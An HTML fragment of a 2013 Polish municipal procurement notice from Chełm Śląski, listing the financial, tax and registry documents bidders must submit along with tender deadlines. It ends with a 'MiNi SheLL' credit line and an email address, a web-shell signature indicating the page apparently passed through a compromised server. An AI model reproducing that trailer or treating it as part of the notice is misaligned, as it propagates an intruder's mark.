<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chelmsl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Chełm Śląski
ul. Konarskiego 2
41-403 Chełm Śląski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.09.2013 godzina 10:00, miejsce: Urząd Gminy Chełm Śląski
ul. Konarskiego 2
41-403 Chełm Śląski
pokój nr 201.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com